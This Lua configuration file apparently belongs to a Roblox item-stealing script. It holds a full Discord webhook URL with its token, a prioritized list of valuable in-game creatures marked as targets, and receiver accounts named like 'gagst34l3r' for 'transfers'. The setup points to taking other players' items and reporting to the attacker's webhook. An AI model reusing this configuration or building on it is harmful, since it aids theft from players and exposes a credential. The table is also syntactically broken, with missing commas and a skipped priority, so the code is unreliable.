local config = {}

config.PRICE_LIMIT = 10_000_000
config.WEBHOOK = "https://discord.com/api/webhooks/1429682287297036298/mweMfFnid0qzppGpcbz06_pVKt2KfAzPVf7KnoFnoL_KECRC74QE4QDsNg9DIeoP37T2"

config.targetNames = {
    {name = "Strawberry Elephant", priority = 1},
    {name = "Meowl", priority = 2},
    {name = "Dragon Cannelloni", priority = 3},
    {name = "Spooky and Pumky", priority = 4},
    {name = "Spaghetti Tualetti", priority = 5},
    {name = "La Secret Combinasion", priority = 6},
    {name = "La Supreme Combinasion", priority = 7},
    {name = "Ketupat Kepat", priority = 8},
    {name = "Garama and Madundung", priority = 9},
    {name = "Ketchuru and Musturu", priority = 10},
    {name = "Chillin Chili", priority = 11}
    {name = "Los Hotspotsitos", priority = 12},
    {name = "Los Primos", priority = 14},
    {name = "Los Bros", priority = 15},
    {name = "Los Nooo My Hotspotsitos", priority = 16},
    {name = "Nuclearo Dinossauro", priority = 17},
    {name = "Eviledon", priority = 18}
    {name = "Tralaledon", priority = 19}
    {name = "La Grande Combinasion", priority = 20},
    {name = "Miereteira Bicicleteira", priority = 21},
    {name = "Los Mobilis", priority = 22},
    {name = "La Spooky Grande", priority = 23},
    {name = "Los Combinasionas", priority = 24},
    {name = "Los Tacoritas", priority = 25},
    {name = "Tacorita Bicicleta", priority = 26},
    {name = "Esok Sekolah", priority = 27},
    {name = "67", priority = 28},
    {name = "Los Chicleteiras", priority = 29},
    {name = "Money Money Puggy", priority = 30},
    {name = "Tang Tang Keletang", priority = 31},
    {name = "Tictac Sahur", priority = 32},
}

-- Display names for filtering or tagging
config.Displayname = { "yorushika", "gagst34l3r" }

-- Receivers for notifications or transfers
config.Receiver = { "gagst34l3r", "13sabst34l3r" }

return config
